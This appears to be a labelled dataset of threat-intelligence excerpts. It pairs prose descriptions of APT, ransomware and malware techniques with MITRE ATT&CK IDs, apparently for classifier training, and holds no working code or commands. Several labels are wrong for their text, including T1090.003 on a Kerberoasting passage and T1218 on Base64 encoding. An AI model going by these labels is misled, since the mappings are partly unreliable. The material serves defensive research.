{"text1":"In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.. In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted.\u00a0. In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.. From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.","labels":"['T1587.001']"}
{"text1":"SPLM, otherwise known as CHOPSTICK, or by the author(s) as \u201cXAgent\u201d, is described as Sofacy\u2019s signature second stage tool, selectively used for years against around the world. Really, many modified XAgent modules have been deployed over the years. Even the individual Linux modules renamed as \u201cFysbis\u201d backdoors released in 2016 were merely modified and reduced portions of recompiled XAgent C\/C++ codebase. Anyway, SPLM\/CHOPSTICK has maintained various combinations of code, with some recognizable functionality listed here.","labels":"['T1587.001']"}
{"text1":"The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015. Older versions of these USBSTEALER modules were previously described by our colleagues from ESET.","labels":"['T1587.001']"}
{"text1":"SpyNote is similar to Droidjack and is also a commercial RAT. It is powerful and provides convenient management tools.. At present, the price of different versions on the official websited is $499 and $4000 respectively.","labels":"['T1588.001']"}
{"text1":"While investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is.NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.","labels":"['T1587.001']"}
{"text1":". . Once the second stage is extracted and run, we are presented with the final stage of this attack, which we refer to as ComboJack. Once ComboJack is extracted it begins by copying itself to the following location:","labels":"['T1587.001']"}
{"text1":"In order to \u201csteal\u201d cryptocurrency from a victim, WeSteal uses regular expressions to look for strings matching the patterns of Bitcoin and Ethereum wallet identifiers being copied to the clipboard. When it matches these, it replaces the copied wallet ID in the clipboard with one supplied by the malware. The victim then pastes the substituted wallet ID for a transaction, and the funds are sent instead to the substitute wallet.","labels":"['T1115']"}
{"text1":"Spora ransomware, which began circulating in January of this year, is a ransomware noted for its sophistication, including top-notch customer support to victims, and was likely created by professional malicious actors.","labels":"['T1588.001']"}
{"text1":"Earlier in the year, as part of an incident response investigation, we uncovered a new version of the Skimer ATM malware. The malware, which first surfaced in 2009, has been re-designed. So too have the tactics of the cybercriminals using it. The new ATM infector has been targeting ATMs around the world, including the UAE, France, the United States, Russia, Macau, China, the Philippines, Spain, Germany, Georgia, Poland, Brazil and the Czech Republic.","labels":"['T1587.001']"}
{"text1":"FormBook authors did some rewrites on the original exploit, taking as their initial codebase the one that we and Microsoft observed as deploying Cobalt Strike beacons. \u00a0The exploited vulnerability is CVE-2021-40444. However, since the vulnerability itself has been analyzed already, here we focus on describing some of the unique changes made by FormBook.","labels":"['T1203']"}
{"text1":"The 2019 Linux variant of the GoldMax backdoor is almost identical in functionality and implementation to the previously identified May 2020 Windows variant. The very few additions to the backdoor between 2019 and 2020 likely reflect its maturity and longstanding evasion of detections. It is likely GoldMax has been used as a long-term persistence backdoor during StellarParticle-related compromises, which would be consistent with the few changes made to the malware to modify existing functions or support additional functionality.","labels":"['T1587.001']"}
{"text1":"Elknot, also known as BillGates, a very long live and active ddos botnet which targeted Linux systems and was later ported to the Windows platform[4]\u3002. . Now we see Elknot setting its foot on both platforms for this vulnerability, and sharing the same C2 .","labels":"['T1584.005']"}
{"text1":"Janicab\u2019s features also remind us of Powersing\u2019s: the sample contains VM detection based on the MAC address of the machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab also periodically sends screenshot captures of the victim\u2019s desktop to the C&C and appears to enable the execution of arbitrary Python scripts.","labels":"['T1113', 'T1497', 'T1059.006']"}
{"text1":"Functionally, Gauss is designed to collect as much information about infected systems as possible, as well as to steal credentials for various banking systems and social network, email and IM accounts. The Gauss code includes commands to intercept data required to work with several Lebanese banks \u2013 for instance, Bank of Beirut, Byblos Bank, and Fransabank.","labels":"['T1114', 'T1082']"}
{"text1":"GandCrab 2 is far from a merely repackaged GandCrab 1. It contains fixes for several flaws in the original, including one critical encryption flaw that would have trivially allowed a universal decryptor (more on this below).","labels":"['T1587.001']"}
{"text1":"The main loader and privilege escalation tool, \u201cautorun.exe\u201d fires up a special dropper, which is actually an Equation Group DoubleFantasy implant installer. The installer is stored as \u201cshow.dll\u201d in the \u201cPresentation\u201d folder of the CDROM.","labels":"['T1068']"}
{"text1":"Unlike the original geacon, Blackrota uses gobfuscate to obfuscate the. source code before compiling. gobfuscate is an open-source tool for Go code. obfuscation, which can obfuscate the following elements of Go source code. with random character substitutions:","labels":"['T1001']"}
{"text1":"As the Top Twenty shows, DNSChanger is also widespread. There is actually a connection between Zlob and DNSChanger \u2013 we believe they were created by the same gang. Although DNSChanger underwent many changes during its lifespan, basically what it does is simply change the DNS servers from the user\u2019s computer to a set of two specific IP addresses. The IP addresses are selected from a huge pool and the variation comes in distributing thousand of different DNSChanger binaries, each one setting the DNS servers to distinct IP addresses. While changing the DNS servers may not be regarded as something seriously malicious, an attacker who achieves this can actually do a lot of harm \u2013 for instance, redirecting websites such as Amazon.com or Bank Of America to phishing installations almost entirely without any sign of warning to the user. To complicate removal, the most recent DNSChangers include rootkit components and even download additional malware.","labels":"['T1014']"}
{"text1":"The group\u2019s arsenal at that point included multiple Trojans and tools for Windows and macOS. In 2015, the actors started to expand their espionage efforts from PCs to mobile devices using the spyware called MobileOrder, which focused on compromising Android devices. Based on the code similarity, shared infrastructure and victimology, we conclude that the new wave of attacks belongs to the same threat actor and that the group continues to deploy and develop MobileOrder malware until this day. In addition to clear code overlaps, we observed multiple overlaps in the infrastructure between the new samples and the old MobileOrder malware variant, as well as multiple variants of Windows Psylo Trojan previously attributed to Scarlet Mimic, that interact with the same malicious domains as the mobile malware.","labels":"['T1587.001']"}
{"text1":"The downloader\u2019s process termination starts with killing the DDG Monero miner botnet client if present on the system, followed by a variety of other cryptominers, including other XMRig instances. This behavior is indicative of attempting to secure more host resources from competing miners. The malware also targets services belonging to Qihoo 360, an antivirus service, in order to reduce the chance of detection. However, taskkill is unable to to kill process related to Qihoo 360. Figure 5 shows the processes that the script attempts to terminate.","labels":"['T1057', 'T1518.001']"}
{"text1":"The NOKKI payload is written to %LOCALAPPDATA%\\MicroSoft Updatea\\svServiceUpdate.exe prior being executed in a new process. Persistence is achieved by writing the file path to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svstartup registry key.","labels":"['T1547.001']"}
{"text1":"In 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored in Intezer\u2019s research. In fact, this was a new component \u2014 called Tonnerre \u2014 which was a new step in the evolution of Infy, and contained various functionality absent from Foudre alone.","labels":"['T1587.001']"}
{"text1":"The BazarLoader ISO downloaded from the OneDrive link, consists of a malicious DLL and shortcut file named \u201cDocuments.lnk\u201d which executes the DLL via rundll32.exe.","labels":"['T1218.011']"}
{"text1":"The last type of shellcode is a Cobalt Strike stager. We have confirmed the use of several different Cobalt Strike stager shellcodes since October 2019. In addition, some of the observed Cobalt Strike stager samples included a setting in the HTTP header of their malicious communications to disguise them as common jQuery request in order to evade detection by security products.","labels":"['T1588.001']"}
{"text1":"FIN13 rolled many of these reconnaissance efforts into scripts to automate their processes. For example, they used pi.bat to iterate through a list of IP addresses in a file, execute a ping command and write the output to a file (Figure 6). A similar script used dnscmd to export a host\u2019s DNS zones to a file.","labels":"['T1595.001', 'T1059.003']"}
{"text1":"The executable dispci.exe appears to be derived from the code base of the legitimate utility DiskCryptor. It acts as the disk encryption module which also installs the modified bootloader and prevents the normal boot-up process of the infected machine.","labels":"['T1561.002']"}
{"text1":"After the botnets of direct ZeuS successors were taken down, Dridex\u2019s time came. This malware is a result of Bugat evolution (which appeared in 2010). Bugat v5 was recognized as Dridex in 2014.","labels":"['T1587.001']"}
{"text1":"The injected wermgr.exe process then creates a new folder in the user\u2019s AppData directory. As typically seen in Trickbot infections, it drops a copy of itself into this folder along with its encrypted config (settings.ini) and a batch file (launcher.bat).\u00a0","labels":"['T1055']"}
{"text1":"A sample of the data that is encrypted and sent to the CnC server for version \u2018p=2\u2019 is seen in the memory dump shown in Figure 6. At offset 4-7 it contains a time-based counter. It uses the keyword \"osamu\" in this instance to identify this particular campaign. The campaign keywords are not sent out in version \u2018p=1\u2019 but can still be found hardcoded in the DLL payload. The hostname and OS information are also included in the beacon. It awaits further commands from the CnC server in response to the data sent out.","labels":"['T1082']"}
{"text1":"The dropper extracts the communications and wiper components from resources named \u201cPKCS7\u201d and \u201cPKCS12\u201d respectively, while the x86 sample extracts the x64 variant of Disttrack from a resource named \u201cX509\u201d. To extract the components, the dropper is configured to seek specific offsets within the resource, read a specified number of bytes and decrypt the contents using a specified key. The key exists in the sample as a base64 encoded string that the dropper will decode then use each byte of the resulting string to XOR the data obtained from the resource. When determining the location of the ciphertext within the resource, the dropper subtracts 14 from the offset value in the sample\u2019s configuration as an additional layer of obfuscation. Table 1 shows the resources within the Disttrack x86 sample, the component it contains and the values needed to decrypt its contents.","labels":"['T1132']"}
{"text1":"It appears Russian cyber criminals were equally perplexed by the WCry campaign as the rest of the world. One of the members of the popular underground community complained about the recently purchased Virtual Private Server (VPS) which was almost immediately infected by ransomware even before the system update was completed.","labels":"['T1584.003']"}
{"text1":"Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader.","labels":"['T1027.003', 'T1001.002']"}
{"text1":"BokBot achieves malicious payload execution by abusing a renamed copy of the legitimate WMIC utility, which will execute a XSL script file. The entire process is outlined below.","labels":"['T1220']"}
{"text1":"A modified EternalBlue exploit, also used by WannaCry.. The EternalRomance exploit \u2013 a remote code execution exploit targeting Windows XP to Windows 2008 systems over TCP port 445 (Note: patched with MS17-010).. An attack against the update mechanism of a third-party Ukrainian software product called MeDoc.","labels":"['T1203']"}
{"text1":"The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.","labels":"['T1547.001', 'T1547.001']"}
{"text1":"The SLUB backdoor is a custom one written in the C++ programming language, statically linking curl library to perform multiple HTTP requests. Other statically-linked libraries are boost (for extracting commands from gist snippets) and JsonCpp (for parsing slack channel communication).","labels":"['T1587.001']"}
{"text1":"Last March, we reported a WildPressure campaign targeting industrial-related entities in the Middle East. While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.","labels":"['T1587.001']"}
{"text1":"Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified. The following example Python code shows how this encryption takes place:","labels":"['T1573']"}
{"text1":"If any of the above files or directories exist, the Windows executable throws an exception and exits. This indicates Redaman checks if it is running in a sandbox or similar type of analysis environment.","labels":"['T1497']"}
{"text1":"After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program \u201csvcmondr.exe\u201d (8052234dcd41a7d619acb0ec9636be0b).","labels":"['T1203']"}
{"text1":"And finally, a mention of Trojan-Downloader.Win32.CWS.j, another common site on malicious websites. This downloader is basically a small stub which downloads and installs variants of CWS, perhaps better known as CoolWebSearch. CoolWebSearch is a malicious program which was first reported circa 2003. Ever since, a huge number of variants have been found in the wild, most of them following the same pattern of hijacking the browser startup page and displaying pornographic pop-ups. Over time, CWS variants have become more and more complex and the latest versions include rootkit stealth components and retro features designed to terminate antivirus programs.","labels":"['T1176', 'T1014', 'T1588.001']"}
{"text1":"The Russian-speaking APT group Turla (known variously as \u2018Snake\u2019, \u2018Uroburos\u2019, \u2018Venomous Bear\u2019 and \u2018KRYPTON\u2019) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We\u2019ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper\/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.","labels":"['T1587.001']"}
{"text1":"BONDUPDATER waits to receive an instruction from the C2 server that starts with \u201cE\u201d before writing the downloaded data to the supplied filename. After receiving the \u201cE\u201d instruction, the Trojan will write the base64 decoded data to the file and process the newly created file. Figure 27 shows the C2 server providing the \u201cE\u201d instruction within the TXT answer. In the current example, the Trojan would treat the newly saved file as a script thanks to the filename ending with the \u201c0\u201d character. The Trojan would run the contents of the file using \u201ccmd.exe\u201d and save the output to a file named \u201cproc10100\u201d that will be uploaded to the C2 server.","labels":"['T1059.003']"}
{"text1":"Based on posts on an underground forum, we believe that the developer of Chthonic supplies binaries to other cyber-criminals and rents out the C2 infrastructure. Therefore, this distribution of victims likely represents several otherwise unconnected cyber-crime operations.","labels":"['T1588.001', 'T1583']"}
{"text1":"When the news broke in 2014 about a new sophisticated threat actor dubbed the Turla Group, which the Estonian foreign intelligence service believes has Russian origins and operates on behalf of the FSB, its kernelmode malware also became the first publicly-described case that abused a third-party device driver to disable Driver Signature Enforcement (DSE). This security mechanism was introduced in Windows Vista to prevent unsigned drivers from loading into kernel space. Turla exploited the signed VirtualBox driver, VBoxDrv.sys v1.6.2, to deactivate DSE and load its unsigned payload drivers afterward.","labels":"['T1211']"}
{"text1":"Since December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails related to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to make it look like the text had an encoding problem, encouraging the user to press a button to \u201cEnable Content\u201d.","labels":"['T1566.001']"}
{"text1":"Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not.","labels":"['T1596.003']"}
{"text1":"The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.","labels":"['T1587.001']"}
{"text1":"In Figure 4, the first DNS query to resolve is. . yFIOr645245444143544544.windows64x[.]com which acts as an initial beacon. The first five characters (yFIOr) are random and have no purpose other than generating random subdomains in order to avoid DNS caching. The next two characters (64) signify the Hex notation of the d request type, which is the request type for the initial beacon as noted in Table 3. The request type is followed by the system specific hostname hardcoded into the sample, which in this case is 5245444143544544 for <REDACTED>.","labels":"['T1583.002']"}
{"text1":"As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant \u2013 Mukashi.","labels":"['T1588.006']"}
{"text1":"This is exceedingly noisy traffic. Furthermore, Hancitor has demonstrated a noticeable lack of stealth in deploying and using this ping tool. Such an unusual EXE file is easy to notice, especially when the results of its scan are saved as a text file in the same directory.","labels":"['T1588.002', 'T1588.002']"}
{"text1":"In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 )\u00a0announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.","labels":"['T1584.005', 'T1588.006', 'T1203']"}
{"text1":"Palo Alto Networks WildFire observed commands provided by the C2 server for the known Helminth samples. The commands, as seen below, show that the threat actors are attempting to do initial information gathering on the system, including available user accounts, username, computer name, running tasks, services, network services and if remote desktop is enabled.","labels":"['T1033', 'T1049', 'T1590', 'T1082']"}
{"text1":"The Wekby group continues to target various high profile organizations using sophisticated malware. The pisloader malware family uses various novel techniques, such as using DNS as a C2 protocol, as well as making use of return-oriented programming and other anti-analysis tactics.","labels":"['T1583.002']"}
{"text1":"While analyzing this intrusion, we observed further persistence via scheduled tasks associated with post-exploitation activities.. . This scheduled task with name HpSupport executed a Cobalt Strike Beacon kaslose64.dll both on the Domain Controller and the File Server:","labels":"['T1053.005', 'T1053']"}
{"text1":"Without the encrypted AES key appended to the encrypted files, even if the private key used for encryption was recovered, the files could not be decrypted. Therefore, the Hermes executable used in the FEIB SWIFT attack appears never to have been used to ransom the machine, but rather to destroy the victim\u2019s data. ","labels":"['T1486']"}
{"text1":"In total Unit 42 has seen over 50 versions of these weaponized documents spanning from late October through to March. We\u2019ve used these to lay out a timeline, which will be referenced throughout the remainder of this blog, of the milestones of evolution that provides some insight into why the changes are made. Note: This figure does not cover all versions seen but simply milestone changes. It does however start with the first version created on October 23rd, last saved 25th October and first seen by our Wildfire cloud sandbox 26th October.","labels":"['T1587.001']"}
{"text1":"Throughout the intrusion, the injected Cobalt Strike Processes utilized various named pipes for inter-process communications. Many of these pipes used default Cobalt Strike pipe patterns.","labels":"['T1055']"}
{"text1":"This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:","labels":"['T1574.011']"}
{"text1":". . The bot will report key information back to the C&C, including the result of the various custom API executions. The first communications include any hard-coded C&C followed by the DGA. Shifu uses RC4 encryption in the network communications. Notably, the key for the samples analyzed by iSIGHT Partners is actually the default RC4 key included with the Crypto library, further suggesting this malware is under development. The following is the key observed:","labels":"['T1587.001']"}
{"text1":"Figure 32 shows QUADAGENT issuing DNS requests with incrementing sequence numbers and the C2 providing the session identifier and pre-shared key within the IPv6 answers. The screenshot also shows the Trojan sending a DNS query to notify the C2 that it successfully received the data.","labels":"['T1583.002']"}
{"text1":"For this method, Ransom Cartel uses a tool named \"\"DonPAPI,\"\" which can search hosts for DPAPI blobs containing Wi-Fi keys, RDP passwords, and credentials saved in web browsers and then download and decrypt them locally on the machine.","labels":"['T1587.001']"}
{"text1":"It also can make and send screenshots to the C&C, as well as any file that matches a specified mask.","labels":"['T1113']"}
{"text1":"Using spear-phishing emails that contained malicious Amazon-themed documents, the group targeted an employee of an aerospace company in the Netherlands and a political journalist in Belgium.","labels":"['T1566.003']"}
{"text1":"It reads and executes commands from a text file stored in Mega cloud storage","labels":"['T1530']"}
{"text1":"BlackLotus claims to come with anti-virtual machine (anti-VM), anti-debug, and code obfuscation features to block malware analysis attempts. The seller also claims that security software cannot detect and kill the bootkit as it runs under the SYSTEM account within a legitimate process.","labels":"['T1497']"}
{"text1":"These credentials are then used to compromise Linux ESXi servers and authenticate to their vCenter web interfaces.","labels":"['T1199']"}
{"text1":"CreepyUp: uploads any file to the C&C server.","labels":"['T1105']"}
{"text1":"The browser extension serves as adware and an infostealer, leaking all of the user\u2019s search engine queries. We discovered significant changes and additions of capabilities throughout this campaign's evolution, and we predict further changes as this campaign continues.","labels":"['T1217']"}
{"text1":"Creates new users\u2019 accounts","labels":"['T1136.001']"}
{"text1":"The campaign commences via a SPAM email containing a malicious new URL being sent to potential victims. The URL landing page presents the recipient with a password for a ZIP file.","labels":"['T1566.002']"}
{"text1":"UEFI bootkits are planted in the system firmware and are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence.","labels":"['T1542.001']"}
{"text1":"During the defense evasion phase, anti-malware and monitoring software is often disabled. Firewall rules have occasionally been seen being disabled as well.","labels":"['T1489', 'T1489']"}
{"text1":"With the upsurgence of ProxyShell, webshells have become more common entry points.","labels":"['T1505.003', 'T1505.003']"}
{"text1":"Adds newly created accounts to the administrators group to maintain elevated access.","labels":"['T1098']"}
{"text1":"Most of the fake lures for this campaign are related to games, subtitle files, adult videos, and cracked MS Office applications. These are hosted in ZIP format on legitimate file hosting services.","labels":"['T1189']"}
{"text1":"The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format","labels":"['T1059.005']"}
{"text1":"In one case the attackers used one module for taking screenshots and another for uploading them to the C&C server","labels":"['T1113']"}
{"text1":"Identity theft via hijacking user-profiles and stealing their cryptocurrency, or using popular accounts to spread malware and\/or scams","labels":"['T1083']"}
{"text1":"During the extraction, a JSP webshell is deployed on one of the public directories used by the webmail component. The attacker can browse to the webshell to start executing arbitrary commands on the victim machine.","labels":"['T1059']"}
{"text1":"Obscure secure messaging client as delivery vehicle for malware and cloak for malicious activity","labels":"['T1573']"}
{"text1":"Compromises users\u2019 saved passwords from browsers.","labels":"['T1555.003']"}
{"text1":"Process Explorer, Process Monitor and PCHunter have been utilized to discover any anti-malware or monitoring software and terminate it.","labels":"['T1057', 'T1057']"}
{"text1":"The ZIP file contains a single .ISO file. The use of an ISO file is an attempt to defeat the \u201cMark of the Web (MOTW),\u201d which tags files as being downloaded from the internet. It subjects these files to additional security measures by Windows and endpoint security solutions.","labels":"['T1553.005']"}
{"text1":"AnyDesk has been the most common legitimate desktop software used to establish an interactive command and control channel, with ConnectWise seen slightly less frequently.","labels":"['T1219', 'T1219']"}
{"text1":"By using DoH, attackers can hide DNS queries from C&C domains. If SSL\/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C&C server will therefore go unnoticed. ","labels":"['T1572']"}
{"text1":"Uses encoded PowerShell commands.","labels":"['T1027']"}
{"text1":"Mailman: communicates with a C&C server to receive commands and writes them to a file. It also sends the file with output from commands to the C&C server.","labels":"['T1071']"}
{"text1":"Affiliates have been seen brute forcing exposed RDP services and compromising accounts with weak passwords.","labels":"['T1078.003', 'T1133']"}
{"text1":"Uses Rclone to exfiltrate data to cloud sharing websites (such as PCloud and MegaSync).","labels":"['T1567.002']"}
{"text1":"Clears Windows PowerShell and WitnessClientAdmin log file.","labels":"['T1070.003']"}
{"text1":"Those campaigns relied on social engineering attacks through LinkedIn, pushing .NET Core malware masquerading as a PDF document supposedly containing details about a marketing project.","labels":"['T1566.003']"}
{"text1":"Victims receive spear phishing emails with attached malicious zip files - typically password protected or HTML file. That file contains an ISO file.","labels":"['T1566.001']"}
{"text1":"Finally, the threat actors shut down VMs, terminate all related processes, and encrypt Vmware-related files (.log, .vmdk, .vmem, .vswp and .vmsn).","labels":"['T1486']"}
{"text1":"Uses wevtutil to clear the Windows event logs.","labels":"['T1070.001']"}
{"text1":"Deletes rules in the Windows Defender Firewall exception list related to AnyDesk ","labels":"['T1562.004']"}
{"text1":"Dumps password hashes for use in pass the hash authentication attacks.","labels":"['T1550.002']"}
{"text1":"For C&C communication, POLONIUM abuses common cloud services such as Dropbox, OneDrive, and Mega.","labels":"['T1136.003']"}
{"text1":"The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to an embedded control center.","labels":"['T1102']"}
{"text1":"The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object","labels":"['T1570']"}
{"text1":"TechnoCreep is a previously undocumented C# backdoor that communicates with a C&C server via TCP sockets. In this case, commands are not read from a file, but received in an exchange of messages","labels":"['T1071']"}
{"text1":"It is able to steal autofill information from web browsers, cookies, saved credit cards, browser history, coin wallets and Telegram databases. ","labels":"['T1185']"}
{"text1":"Credentials that have either been reused across multiple platforms or have previously been exposed. Additionally, this includes VPN accounts - not just domain and local accounts.","labels":"['T1078']"}
{"text1":"LockBit 2.0 is typically executed via command line arguments via a hidden window. Windows SysInternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities.","labels":"['T1059']"}
{"text1":"It was quite common to see scheduled tasks used to create persistence for the ransomware executable, PsExec, and occasionally some defense evasion batch scripts.","labels":"['T1053.005']"}
{"text1":"In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as `a.`","labels":"['T1136.001']"}
{"text1":"LockBit 2.0 enumerates system information such as hostname, shares, and domain information.","labels":"['T1082']"}
{"text1":"MEGASync is the leading way for LockBit 2.0 affiliates to exfiltrate data from clients with it being occasionally replaced by RClone.","labels":"['T1041']"}
{"text1":"LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom.","labels":"['T1486']"}
{"text1":"The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities.","labels":"['T1593.001']"}
{"text1":"Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google search engine to target victims","labels":"['T1593.002']"}
{"text1":"Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking.","labels":"['T1090.003', 'T1558.003']"}
{"text1":"identify configuration settings, exfiltrate data, and to execute other commands.","labels":"['T1059.003']"}
{"text1":"Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks.","labels":"['T1078']"}
{"text1":"Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database ntds.dit.","labels":"['T1003.003']"}
{"text1":"Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords.","labels":"['T1555']"}
{"text1":"BlackMatter may wipe backup systems.","labels":"['T1561']"}
{"text1":"BlackMatter remotely encrypts shares via SMB protocol and drops a ransomware note in each directory.","labels":"['T1486']"}
{"text1":"BlackMatter uses srvsvc.NetShareEnumAll MSRPC function to enumerate and SMB to connect to all discovered shares, including ADMIN$, C$, SYSVOL, and NETLOGON.","labels":"['T1021.002']"}
{"text1":"BlackMatter uses EnumServicesStatusExW to enumerate running services on the network.","labels":"['T1007']"}
{"text1":"BlackMatter uses NtQuerySystemInformation to enumerate running processes","labels":"['T1057']"}
{"text1":"BlackMatter leverages LDAP and SMB protocol to discover all hosts in the AD.","labels":"['T1018']"}
{"text1":"BlackMatter leverages legitimate remote monitoring and management software and remote desktop software, often by setting up trial accounts, to maintain persistence on victim networks.","labels":"['T1133']"}
{"text1":"Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.","labels":"['T1595', 'T1590']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.","labels":"['T1583', 'T1583']"}
{"text1":"Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems. [1] For information on vulnerabilities known to be exploited by Chinese statesponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. Chinese state-sponsored cyber actors have also been observed: \uf0b7 Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae ) and plant webshells. \uf0b7 Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources. \uf0b7 Deploying a public proof of concept (POC) exploit targeting a publicfacing appliance vulnerability.","labels":"['T1190']"}
{"text1":"Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. These compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.","labels":"['T1566.001', 'T1566.002']"}
{"text1":"Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.","labels":"['T1078.001', 'T1078.002']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks.","labels":"['T1053.003', 'T1053.005']"}
{"text1":"Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.","labels":"['T1204.001', 'T1204.002']"}
{"text1":"Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) loadorder hijacking to activate the malware installation process.","labels":"['T1574.001']"}
{"text1":"Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.","labels":"['T1556.001']"}
{"text1":"Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.","labels":"['T1505.003']"}
{"text1":"Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence","labels":"['T1543.003']"}
{"text1":"Chinese state-sponsored cyber actors have been observed: \uf0b7 Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. \uf0b7 Using shellcode that injects implants into newly created instances of the Service Host process (svchost).","labels":"['T1055.001', 'T1055.002']"}
{"text1":"Chinese state-sponsored cyber actors were observed using the 7- Zip utility to unzip imported tools and malware files onto the victim device.","labels":"['T1140']"}
{"text1":"Chinese state-sponsored cyber actors were observed using benign executables which used DLL loadorder hijacking to activate the malware installation process.","labels":"['T1564']"}
{"text1":"Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.","labels":"['T1218.005', 'T1218.011']"}
